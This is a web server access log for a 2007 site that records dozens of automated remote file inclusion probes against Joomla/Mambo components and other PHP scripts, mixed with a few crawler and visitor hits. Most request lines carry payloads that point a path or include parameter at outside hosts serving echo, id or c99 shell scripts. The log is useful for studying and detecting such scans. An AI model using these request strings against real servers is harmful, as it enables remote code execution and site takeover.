66.80.60.41 - - [12/Aug/2007:20:40:23 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:40:23 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:40:23 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:40:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:20:42:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:20:42:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:20:44:31 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:20:44:32 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.15.139.164 - - [12/Aug/2007:20:48:34 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.15.139.164 - - [12/Aug/2007:20:48:34 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:20:48:34 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
201.230.240.51 - - [12/Aug/2007:20:48:38 -0700] "GET / HTTP/1.1" 200 1048 "http://www.rompiendoelsilencio.cl/sitiosamigos/_sitiosamigos.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
201.230.240.51 - - [12/Aug/2007:20:48:44 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:20:49:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:20:49:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:20:49:20 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.230.240.51 - - [12/Aug/2007:20:49:45 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:20:50:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:20:51:49 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:20:51:49 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.79.162.193 - - [12/Aug/2007:20:53:12 -0700] "GET /logs/access_070604.loghttp://wantedhacker.atspace.org/cmd/c99.php? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
201.79.162.193 - - [12/Aug/2007:20:53:12 -0700] "GET /logs/access_070625.loghttp://wantedhacker.atspace.org/cmd/c99.php? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
69.57.160.250 - - [12/Aug/2007:20:53:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cs-steel.com/modules/xfsection/files/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.57.160.250 - - [12/Aug/2007:20:53:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cs-steel.com/modules/xfsection/files/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.216.236.209 - - [12/Aug/2007:20:59:40 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.110.144.106 - - [12/Aug/2007:20:59:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
217.110.144.106 - - [12/Aug/2007:20:59:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.193.237.43 - - [12/Aug/2007:21:02:28 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [12/Aug/2007:21:02:28 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
222.122.158.50 - - [12/Aug/2007:21:02:37 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:21:03:08 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
58.29.43.67 - - [12/Aug/2007:21:03:09 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:21:06:36 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:21:09:07 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.44 - - [12/Aug/2007:21:09:07 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
217.20.113.147 - - [12/Aug/2007:21:10:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.20.113.147 - - [12/Aug/2007:21:10:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.20.113.147 - - [12/Aug/2007:21:12:07 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.20.113.147 - - [12/Aug/2007:21:12:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:21:15:57 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [12/Aug/2007:21:15:57 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.6.28.105 - - [12/Aug/2007:21:18:24 -0700] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.25.171 - - [12/Aug/2007:21:19:51 -0700] "GET /logs/access_070813.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:21:23:47 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:21:23:50 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.66.107 - - [12/Aug/2007:21:24:04 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ryan-gluesing.com/gallery/data/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.147.235.83 - - [12/Aug/2007:21:24:25 -0700] "GET /sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://mendes2007.bravehost.com/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.55.78.18 - - [12/Aug/2007:21:25:47 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/reaksi? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
201.147.235.83 - - [12/Aug/2007:21:25:49 -0700] "GET /sohoadmin/program/modules/mods_full/database_manager/includes/login.php?_SESSION[docroot_path]=http://mendes2007.bravehost.com/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.28.112.93 - - [12/Aug/2007:21:27:16 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
212.227.109.186 - - [12/Aug/2007:21:27:22 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/coba? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:21:27:26 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:21:27:27 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.216.236.209 - - [12/Aug/2007:21:30:07 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.66.107 - - [12/Aug/2007:21:31:27 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ryan-gluesing.com/gallery/data/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [12/Aug/2007:21:31:27 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ryan-gluesing.com/gallery/data/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.227.109.186 - - [12/Aug/2007:21:33:54 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/coba? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
212.227.109.186 - - [12/Aug/2007:21:33:54 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/coba? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:21:33:59 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:21:33:59 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.55.78.18 - - [12/Aug/2007:21:34:12 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/reaksi? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
66.55.78.18 - - [12/Aug/2007:21:34:12 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/reaksi? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
213.203.195.2 - - [12/Aug/2007:21:34:32 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.203.195.2 - - [12/Aug/2007:21:34:32 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.49.208.67 - - [12/Aug/2007:21:34:44 -0700] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.mynpe.com/nav?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.133.243.155 - - [12/Aug/2007:21:35:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
202.133.243.155 - - [12/Aug/2007:21:35:21 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
58.29.43.67 - - [12/Aug/2007:21:35:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.31.151.21 - - [12/Aug/2007:21:37:25 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.31.151.21 - - [12/Aug/2007:21:37:26 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:21:37:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.29.43.67 - - [12/Aug/2007:21:39:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
212.191.172.5 - - [12/Aug/2007:21:39:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.133.243.155 - - [12/Aug/2007:21:39:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.133.243.155 - - [12/Aug/2007:21:39:51 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.66.107 - - [12/Aug/2007:21:41:35 -0700] "GET /logs/access_070730.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ryan-gluesing.com/gallery/data/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.23.229 - - [12/Aug/2007:21:42:20 -0700] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:21:42:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:21:43:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.42.186.129 - - [12/Aug/2007:21:46:02 -0700] "GET /logs/?S=A HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows;) NimbleCrawler 2.0.1 obeys UserAgent NimbleCrawler For problems contact: crawler@healthline.com" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:21:47:09 -0700] "GET //skin/zero_vote/error.php?dir=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:21:47:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:21:47:35 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:21:47:35 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.55.78.18 - - [12/Aug/2007:21:48:12 -0700] "GET /logs/access_070730.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.jobos.cz/standardy/konzultanti/reaksi? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
209.85.170.136 - - [12/Aug/2007:21:49:43 -0700] "GET /logs/access_070521.log HTTP/1.0" 200 199384 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Google Wireless Transcoder;)" "www.galf.org"
74.6.29.42 - - [12/Aug/2007:21:51:35 -0700] "GET /?N=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:00:57 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:00:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:01:04 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:01:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:22:01:54 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:22:01:54 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.216.213.227 - - [12/Aug/2007:22:02:25 -0700] "GET /sohoadmin/program/modules/mods_full/statistics/includes/login.php?_SESSION[docroot_path]=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:22:03:06 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.137.176.133 - - [12/Aug/2007:22:03:07 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:05:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:05:14 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.226 - - [12/Aug/2007:22:07:15 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:15:10 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.162.131 - - [12/Aug/2007:22:15:44 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.151.69.2 - - [12/Aug/2007:22:16:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.216.213.227 - - [12/Aug/2007:22:21:43 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.193.232.6 - - [12/Aug/2007:22:23:54 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.232.6 - - [12/Aug/2007:22:23:54 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://send10.webspacemania.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:22:24:39 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:22:24:39 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:22:24:53 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:22:24:53 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:22:25:05 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
213.202.240.121 - - [12/Aug/2007:22:25:05 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.148.95.154 - - [12/Aug/2007:22:43:40 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [12/Aug/2007:22:45:41 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
24.154.93.196 - - [12/Aug/2007:22:46:43 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
200.161.16.162 - - [12/Aug/2007:22:48:32 -0700] "GET //index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
222.122.158.50 - - [12/Aug/2007:22:51:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.52.84.194 - - [12/Aug/2007:22:56:30 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.84.194 - - [12/Aug/2007:22:56:30 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
